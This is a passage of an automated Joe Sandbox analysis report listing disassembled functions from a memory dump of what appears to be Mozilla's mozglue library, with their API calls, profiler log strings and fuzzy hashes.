l, xrefs: 6CCA4578
user32.dll, xrefs: 6CCA4557, 6CCA463F
WRusr.dll, xrefs: 6CCA44B5
kernel32.dll, xrefs: 6CCA44CD

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3894940629
Opcode ID: 93bd2a7d3f36f1db290ce2f2a6856b58ed843120b8171a3efbfdeb7a4cf83a54
Instruction ID: 1db1134b4f41fbf75120a082d729a1d4ca1c0ba6f8b7ff2fcee59aeb11c4b063
Opcode Fuzzy Hash: 93bd2a7d3f36f1db290ce2f2a6856b58ed843120b8171a3efbfdeb7a4cf83a54
Instruction Fuzzy Hash: DA61C5F0608245AFFB00DFA5D80AB957BBCEB46308F048559E6049BE91EBB0D987CF51

Function 6CCDF6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CCA4A68), ref: 6CCD945E
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCD9470
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCD9482
Part of subcall function 6CCD9420: __Init_thread_footer.LIBCMT ref: 6CCD949F

GetCurrentThreadId.KERNEL32 ref: 6CCDF70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6CCDF8F9

Part of subcall function 6CCA6390: GetCurrentThreadId.KERNEL32 ref: 6CCA63D0
Part of subcall function 6CCA6390: AcquireSRWLockExclusive.KERNEL32 ref: 6CCA63DF
Part of subcall function 6CCA6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6CCA640E

ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDF93A
GetCurrentThreadId.KERNEL32 ref: 6CCDF98A
GetCurrentThreadId.KERNEL32 ref: 6CCDF990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCDF994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCDF716

Part of subcall function 6CCD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCD94EE
Part of subcall function 6CCD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCD9508

Part of subcall function 6CC9B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6CC9B5E0

GetCurrentThreadId.KERNEL32 ref: 6CCDF739
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDF746
GetCurrentThreadId.KERNEL32 ref: 6CCDF793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6CD1385B,00000002,?,?,?,?,?), ref: 6CCDF829
free.MOZGLUE(?,?,00000000,?), ref: 6CCDF84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6CCDF866
free.MOZGLUE(?), ref: 6CCDFA0C

Part of subcall function 6CCA5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CCA55E1), ref: 6CCA5E8C
Part of subcall function 6CCA5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CCA5E9D
Part of subcall function 6CCA5E60: GetCurrentThreadId.KERNEL32 ref: 6CCA5EAB
Part of subcall function 6CCA5E60: GetCurrentThreadId.KERNEL32 ref: 6CCA5EB8
Part of subcall function 6CCA5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CCA5ECF
Part of subcall function 6CCA5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6CCA5F27
Part of subcall function 6CCA5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6CCA5F47
Part of subcall function 6CCA5E60: GetCurrentProcess.KERNEL32 ref: 6CCA5F53
Part of subcall function 6CCA5E60: GetCurrentThread.KERNEL32 ref: 6CCA5F5C
Part of subcall function 6CCA5E60: GetCurrentProcess.KERNEL32 ref: 6CCA5F66
Part of subcall function 6CCA5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CCA5F7E

free.MOZGLUE(?), ref: 6CCDF9C5
free.MOZGLUE(?), ref: 6CCDF9DA

Strings

Thread , xrefs: 6CCDF789
" attempted to re-register as ", xrefs: 6CCDF858
[D %d/%d] profiler_register_thread(%s), xrefs: 6CCDF71F
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6CCDF9A6

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: 5d269574edc376a59040260f5e2bd15b6df505eb54e9658f3a89c5f48c977851
Instruction ID: ca99b9f39f932d2e197c568c60fe30dc31093dd2d06494de8bdf4f0c04675f48
Opcode Fuzzy Hash: 5d269574edc376a59040260f5e2bd15b6df505eb54e9658f3a89c5f48c977851
Instruction Fuzzy Hash: D3811571A047009FEB11DF64C840BAAB7B5FF85308F45451DEA4997B51FB30E849CB92

Function 6CCDEE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CCA4A68), ref: 6CCD945E
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCD9470
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCD9482
Part of subcall function 6CCD9420: __Init_thread_footer.LIBCMT ref: 6CCD949F

GetCurrentThreadId.KERNEL32 ref: 6CCDEE60
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDEE6D
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDEE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CCDEEA5
CloseHandle.KERNEL32(?), ref: 6CCDEEB4
free.MOZGLUE(00000000), ref: 6CCDEEBB
GetCurrentThreadId.KERNEL32 ref: 6CCDEEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCDEECF

Part of subcall function 6CCDDE60: GetCurrentThreadId.KERNEL32 ref: 6CCDDE73
Part of subcall function 6CCDDE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CCA4A68), ref: 6CCDDE7B
Part of subcall function 6CCDDE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CCA4A68), ref: 6CCDDEB8
Part of subcall function 6CCDDE60: free.MOZGLUE(00000000,?,6CCA4A68), ref: 6CCDDEFE
Part of subcall function 6CCDDE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CCDDF38

Part of subcall function 6CCCCBE8: GetCurrentProcess.KERNEL32(?,6CC931A7), ref: 6CCCCBF1
Part of subcall function 6CCCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC931A7), ref: 6CCCCBFA

GetCurrentThreadId.KERNEL32 ref: 6CCDEF1E
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDEF2B
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDEF59
GetCurrentThreadId.KERNEL32 ref: 6CCDEFB0
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDEFBD
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDEFE1
GetCurrentThreadId.KERNEL32 ref: 6CCDEFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCDF000

Part of subcall function 6CCD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCD94EE
Part of subcall function 6CCD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCD9508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CCDF02F

Part of subcall function 6CCDF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CCDF09B
Part of subcall function 6CCDF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CCDF0AC
Part of subcall function 6CCDF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CCDF0BE

Strings

[I %d/%d] profiler_stop, xrefs: 6CCDEED7
[I %d/%d] profiler_pause, xrefs: 6CCDF008

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 359ed6d2d7fabc1b40e4666f4917646fe82859bd0e70c683ba93fdef172a85d1
Instruction ID: 4aa77d9a32a684b2d9b9c135ab69a225a40e2756b0da79c9d460846e2a166f3c
Opcode Fuzzy Hash: 359ed6d2d7fabc1b40e4666f4917646fe82859bd0e70c683ba93fdef172a85d1
Instruction Fuzzy Hash: 11512A75704311AFFB009B6AD40A795BBBCEB46358F11051DFB1983F81EB35680AC7A6

Function 6CCA5E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CCA5E9D

Part of subcall function 6CCB5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CCB56EE,?,00000001), ref: 6CCB5B85
Part of subcall function 6CCB5B50: EnterCriticalSection.KERNEL32(6CD1F688,?,?,?,6CCB56EE,?,00000001), ref: 6CCB5B90
Part of subcall function 6CCB5B50: LeaveCriticalSection.KERNEL32(6CD1F688,?,?,?,6CCB56EE,?,00000001), ref: 6CCB5BD8
Part of subcall function 6CCB5B50: GetTickCount64.KERNEL32 ref: 6CCB5BE4

GetCurrentThreadId.KERNEL32 ref: 6CCA5EAB
GetCurrentThreadId.KERNEL32 ref: 6CCA5EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CCA5ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6CCA6017

Part of subcall function 6CC94310: moz_xmalloc.MOZGLUE(00000010,?,6CC942D2), ref: 6CC9436A
Part of subcall function 6CC94310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6CC942D2), ref: 6CC94387

moz_xmalloc.MOZGLUE(00000004), ref: 6CCA5F47
GetCurrentProcess.KERNEL32 ref: 6CCA5F53
GetCurrentThread.KERNEL32 ref: 6CCA5F5C
GetCurrentProcess.KERNEL32 ref: 6CCA5F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CCA5F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6CCA5F27

Part of subcall function 6CCACA10: mozalloc_abort.MOZGLUE(?), ref: 6CCACAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CCA55E1), ref: 6CCA5E8C

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CCA55E1), ref: 6CCA605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CCA55E1), ref: 6CCA60CC

Strings

GeckoMain, xrefs: 6CCA5ECE, 6CCA6015

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: 9838185d90c3b7c751926eee1ff0793262e13fc51a9d70d122412809bcfc8f5c
Instruction ID: ed0eec176e441c44c1abc84ce3356cd35c13ff765ddfe08cf12d4a00919bd551
Opcode Fuzzy Hash: 9838185d90c3b7c751926eee1ff0793262e13fc51a9d70d122412809bcfc8f5c
Instruction Fuzzy Hash: 5771F2B0A047419FD700DF69C484A6ABBF4FF5A304F04496DE58687F52E731E98ACB92

Function 6CCA9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CC931C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CC93217
Part of subcall function 6CC931C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CC93236
Part of subcall function 6CC931C0: FreeLibrary.KERNEL32 ref: 6CC9324B
Part of subcall function 6CC931C0: __Init_thread_footer.LIBCMT ref: 6CC93260
Part of subcall function 6CC931C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CC9327F
Part of subcall function 6CC931C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC9328E
Part of subcall function 6CC931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC932AB
Part of subcall function 6CC931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC932D1
Part of subcall function 6CC931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC932E5
Part of subcall function 6CC931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC932F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CCA9675
__Init_thread_footer.LIBCMT ref: 6CCA9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CCA96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CCA9707
__Init_thread_footer.LIBCMT ref: 6CCA971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CCA9773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CCA97B7
FreeLibrary.KERNEL32 ref: 6CCA97D0
FreeLibrary.KERNEL32 ref: 6CCA97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CCA9824

Strings

Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6CCA9670
ntdll.dll, xrefs: 6CCA96E3
NtMapViewOfSection, xrefs: 6CCA9701
MapViewOfFileNuma2, xrefs: 6CCA97B1

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: 7840455c98847c297bc6320ffedec22a406b855972da63902c5303475a657841
Instruction ID: c541d7696d7a973d9ef4459ecf2a2e359e771622eae2f87e931b1408549a69f4
Opcode Fuzzy Hash: 7840455c98847c297bc6320ffedec22a406b855972da63902c5303475a657841
Instruction Fuzzy Hash: 8E61D7B17042029BEF00DFE5D88AB9A7BB9EB4A314F104519EA1583F90E731D856CBA1

Function 6CCDDE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CCA4A68), ref: 6CCD945E
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCD9470
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCD9482
Part of subcall function 6CCD9420: __Init_thread_footer.LIBCMT ref: 6CCD949F

GetCurrentThreadId.KERNEL32 ref: 6CCDDE73
GetCurrentThreadId.KERNEL32 ref: 6CCDDF7D
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDDF8A
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDDFC9
GetCurrentThreadId.KERNEL32 ref: 6CCDDFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCDE000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CCA4A68), ref: 6CCDDE7B

Part of subcall function 6CCD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCD94EE
Part of subcall function 6CCD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCD9508

Part of subcall function 6CCCCBE8: GetCurrentProcess.KERNEL32(?,6CC931A7), ref: 6CCCCBF1
Part of subcall function 6CCCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC931A7), ref: 6CCCCBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CCA4A68), ref: 6CCDDEB8
free.MOZGLUE(00000000,?,6CCA4A68), ref: 6CCDDEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CCDDF38

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6CCDDE83
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6CCDE00E
<none>, xrefs: 6CCDDFD7

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: 4dbddea4d8f3251f2b13e259384de0a6a97a83a9a650a7ad55a487e4de5078ce
Instruction ID: f60b6a68b84730c68c13ae4b9b69cacd324f8cf826952b524a045a4a76640b23
Opcode Fuzzy Hash: 4dbddea4d8f3251f2b13e259384de0a6a97a83a9a650a7ad55a487e4de5078ce
Instruction Fuzzy Hash: 53410675B016119BFB109F65D8057AAB779EB4630DF050019FB0997F41EB31A80ACBE6

Function 6CCED4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CCED4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CCED4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCED52A
GetCurrentThreadId.KERNEL32 ref: 6CCED530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CCED53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCED55F
free.MOZGLUE(00000000), ref: 6CCED585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CCED5D3
GetCurrentThreadId.KERNEL32 ref: 6CCED5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CCED605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCED652
GetCurrentThreadId.KERNEL32 ref: 6CCED658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CCED667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCED6A2

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 0ebaa49e117085aaba6e00dc9abee4cce8fb1cb40647ec23626fc0ca578d67b8
Instruction ID: 048691e56d815c5ce5ff9934b1653f4d68fbf144fe884cfb039a47e4f97e4575
Opcode Fuzzy Hash: 0ebaa49e117085aaba6e00dc9abee4cce8fb1cb40647ec23626fc0ca578d67b8
Instruction Fuzzy Hash: 2E516FB1604705EFD704DF25C484A9ABBF8FF8A358F00862DE95A87B51EB30E945CB91

Function 6CCDEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CCA4A68), ref: 6CCD945E
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCD9470
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCD9482
Part of subcall function 6CCD9420: __Init_thread_footer.LIBCMT ref: 6CCD949F

GetCurrentThreadId.KERNEL32 ref: 6CCDEC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCDEC8C

Part of subcall function 6CCD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCD94EE
Part of subcall function 6CCD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCD9508

GetCurrentThreadId.KERNEL32 ref: 6CCDECA1
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CCDECC5
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CCDED19
CloseHandle.KERNEL32(?), ref: 6CCDED28
free.MOZGLUE(00000000), ref: 6CCDED2F
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6CCDEC94

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
